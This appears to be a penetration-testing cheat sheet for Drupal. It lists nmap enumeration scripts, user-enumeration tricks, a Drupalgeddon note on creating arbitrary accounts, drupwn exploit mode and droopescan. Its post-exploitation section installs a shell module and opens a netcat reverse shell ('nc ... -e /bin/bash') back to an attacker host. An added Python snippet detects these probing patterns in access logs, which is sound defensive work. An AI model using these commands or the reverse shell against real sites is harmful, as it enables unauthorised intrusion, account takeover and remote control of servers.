Drupal
#NMAP
nmap -p 80 --script http-drupal-enum 10.10.10.10
nmap -p 80 --script http-drupal-enum-users.nse 10.10.10.10
#Misc.
Always check for
/robots.txt /dev /test
In /user/register, try to create a username: if the name is already taken, the form reports it (POC for user admin)
Accessing /user/ you can see the number of existing users
/users/1 /users/2 /users/3 returns a not found error
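Defender's view of the checks above, as an added example (not part of the original notes): a Python pass over web access logs that flags a single client walking /user/N ids, repeatedly posting to /user/register, or requesting the /dev and /test paths. The combined log format, the thresholds, the function name and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Assumed Apache/nginx combined log format: ip - - [time] "METHOD path PROTO" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
UID_RE = re.compile(r"^/users?/(\d+)$")         # /user/1, /users/2, ...
RECON_PATHS = {"/robots.txt", "/dev", "/test"}  # paths listed in the notes above

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2024:10:00:02 +0000] "GET /dev HTTP/1.1" 404 300
198.51.100.7 - - [01/Jan/2024:10:00:02 +0000] "GET /test HTTP/1.1" 404 300
198.51.100.7 - - [01/Jan/2024:10:00:03 +0000] "GET /user/1 HTTP/1.1" 403 300
198.51.100.7 - - [01/Jan/2024:10:00:03 +0000] "GET /user/2 HTTP/1.1" 403 300
198.51.100.7 - - [01/Jan/2024:10:00:04 +0000] "GET /user/3 HTTP/1.1" 404 300
198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "POST /user/register HTTP/1.1" 200 900
198.51.100.7 - - [01/Jan/2024:10:00:06 +0000] "POST /user/register HTTP/1.1" 200 900
198.51.100.7 - - [01/Jan/2024:10:00:07 +0000] "POST /user/register HTTP/1.1" 200 900
203.0.113.20 - - [01/Jan/2024:10:01:00 +0000] "GET /robots.txt HTTP/1.1" 200 1500
203.0.113.20 - - [01/Jan/2024:10:01:05 +0000] "POST /user/register HTTP/1.1" 302 0
203.0.113.20 - - [01/Jan/2024:10:01:09 +0000] "GET /user/5?destination=node HTTP/1.1" 200 4000
""".splitlines()

def find_enumeration(lines, min_uids=3, min_register=3, min_recon=2):
    """Return {client_ip: [tags]} for clients matching the probing patterns."""
    uids, register, recon = defaultdict(set), defaultdict(list), defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed lines instead of failing
        ip, method, target, status = m.groups()
        path = target.split("?", 1)[0].rstrip("/")  # drop query string and trailing slash
        uid = UID_RE.match(path)
        if uid:
            uids[ip].add(int(uid.group(1)))      # distinct numeric ids requested
        elif path == "/user/register" and method == "POST":
            register[ip].append(status)          # each registration attempt
        elif path in RECON_PATHS:
            recon[ip].add(path)
    findings = defaultdict(list)
    for tag, hits, limit in (("uid-walk", uids, min_uids),
                             ("register-probe", register, min_register),
                             ("recon-paths", recon, min_recon)):
        for ip, items in hits.items():
            if len(items) >= limit:
                findings[ip].append(tag)
    return dict(findings)
```

Tune the thresholds to the site's normal traffic; a single registration or one profile view, like the second client in the sample, is not flagged.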
#Drupalgeddon | Drupal 7.0 > 7.31
Syntax:
Arbitrarily creates a new user and password: -u redcliff -p password
#Drupal Shell (Post exploitation)
[1] Once logged in, navigate to modules
[2] http://drupal.org/project/shell #url might vary, check out official documentation
[3] Download either from the URL or directly onto the Kali host, then install
[4] Open from main page (left side)
[5] Launch a revshell directly from the terminal back to the Kali host
nc -nv 10.10.10.11 4444 -e /bin/bash
#Drupwn
drupwn --mode enum --target http://192.168.101.149:80/
Use with sudo, user exploit mode, Metasploit-like interface.
sudo drupwn --mode exploit --target http://192.168.101.149:80/ --users
#Droopescan
https://github.com/SamJoan/droopescan
sudo pip install droopescan
sudo droopescan scan drupal -u 10.11.1.50